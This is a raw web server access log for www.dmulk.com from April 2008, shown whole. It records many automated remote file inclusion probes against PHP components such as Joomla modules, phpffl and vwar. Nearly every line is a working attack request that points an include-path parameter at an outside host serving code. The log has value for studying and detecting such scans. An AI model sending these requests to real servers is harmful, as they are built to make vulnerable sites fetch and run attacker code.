74.52.9.218 - - [10/Apr/2008:11:31:59 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://www.geocities.com/amirandacakep/edan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.104.78.250 - - [10/Apr/2008:11:32:34 -0700] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://163.23.99.193/catalog/images/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
89.104.78.250 - - [10/Apr/2008:11:32:34 -0700] "GET //administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://163.23.99.193/catalog/images/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.61.90 - - [10/Apr/2008:11:32:54 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.144.195.123 - - [10/Apr/2008:11:33:07 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.19.146.161 - - [10/Apr/2008:11:33:27 -0700] "GET /logs/access_080312.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.19.146.161 - - [10/Apr/2008:11:33:28 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
217.19.146.161 - - [10/Apr/2008:11:33:28 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:33:37 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:33:39 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.17.22 - - [10/Apr/2008:11:33:45 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.entgiftungspad.de/cache/cmd7.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:33:59 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
159.28.18.4 - - [10/Apr/2008:11:34:30 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:34:40 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:34:41 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:34:41 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [10/Apr/2008:11:34:54 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [10/Apr/2008:11:34:54 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [10/Apr/2008:11:34:55 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:35:00 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:35:00 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:35:00 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.165.93.49 - - [10/Apr/2008:11:35:01 -0700] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.200.223 - - [10/Apr/2008:11:35:01 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:35:11 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.151.233.69 - - [10/Apr/2008:11:35:16 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.254.214.3 - - [10/Apr/2008:11:35:46 -0700] "GET /logs/access_080118.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.stickypen.com//modules/xfsection/klenk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.12.116.5 - - [10/Apr/2008:11:35:53 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.12.116.5 - - [10/Apr/2008:11:35:53 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:35:54 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:35:55 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:35:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.12.116.5 - - [10/Apr/2008:11:36:29 -0700] "GET /logs/access_080127.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [10/Apr/2008:11:37:54 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:38:07 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.61.90 - - [10/Apr/2008:11:38:09 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [10/Apr/2008:11:38:10 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.61.90 - - [10/Apr/2008:11:38:10 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:11:38:21 -0700] "GET /logs/access_080201.log//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:11:38:22 -0700] "GET //modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:11:38:22 -0700] "GET /logs//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [10/Apr/2008:11:38:30 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:38:35 -0700] "GET /logs/access_080329.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:38:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:38:36 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.35.225.138 - - [10/Apr/2008:11:38:51 -0700] "GET /admin/admin.php?vwar_root=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.190.65.132 - - [10/Apr/2008:11:39:23 -0700] "GET /logs/access_080308.log/index.php?side=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.65.132 - - [10/Apr/2008:11:39:25 -0700] "GET /index.php?side=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.810" "www.dmulk.com"
206.190.65.132 - - [10/Apr/2008:11:39:25 -0700] "GET /logs/index.php?side=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.67.120.48 - - [10/Apr/2008:11:39:40 -0700] "GET /logs/access_080127.log//modules.php?name=Forums&file=search&search_author=DDay/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.eckosystem.eti.br/redeye/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:39:57 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:39:58 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:39:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.91 - - [10/Apr/2008:11:40:21 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.190.65.132 - - [10/Apr/2008:11:40:22 -0700] "GET /logs/access.log/index.php?side=http://www.skg-sprendlingen.de/_test/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:40:39 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:40:39 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:40:40 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:11:40:43 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:11:40:44 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
213.178.225.70 - - [10/Apr/2008:11:40:44 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.19.146.161 - - [10/Apr/2008:11:41:09 -0700] "GET /logs/access_080321.log//index.php?_REQUEST=&_REQUEST[option]=com_peoplebook&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:41:15 -0700] "GET /logs/access_080312.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://66.153.86.221/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:41:40 -0700] "GET /logs/access_080308.log/index.php?redir=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:41:42 -0700] "GET /index.php?redir=http://66.153.86.221/www????????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:41:42 -0700] "GET /logs/index.php?redir=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.123.194.146 - - [10/Apr/2008:11:41:44 -0700] "GET /logs/access_080308.log HTTP/1.1" 200 270336 "-" "x cxnslcpajkrufjtbbgdfkdy gptqhc" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:42:01 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:42:02 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
83.87.143.123 - - [10/Apr/2008:11:42:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.153.86.221/www????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:42:42 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
216.167.156.20 - - [10/Apr/2008:11:42:42 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
208.16.236.69 - - [10/Apr/2008:11:43:09 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.72.29 - - [10/Apr/2008:11:43:14 -0700] "GET /logs/access_080119.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.12.116.5 - - [10/Apr/2008:11:43:15 -0700] "GET /help.php?css_path=http://www.gomaka.com/gomaka/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.89.199 - - [10/Apr/2008:11:43:30 -0700] "GET /logs/access_080312.log/index.php?redir=http://66.153.86.221/www????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.229.125 - - [10/Apr/2008:11:43:41 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.wsteam.net/include.c????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.141.54.186 - - [10/Apr/2008:11:44:17 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.iskanunu.com/administrator/strings.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:21 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:22 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:22 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:24 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:24 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:24 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:25 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:25 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:26 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:27 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:28 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:29 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:31 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:31 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:32 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:33 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:34 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:34 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:34 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:34 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:35 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:35 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:35 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:36 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:44 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:45 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [10/Apr/2008:11:44:45 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://xdengue01.iespana.es/bds/idw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
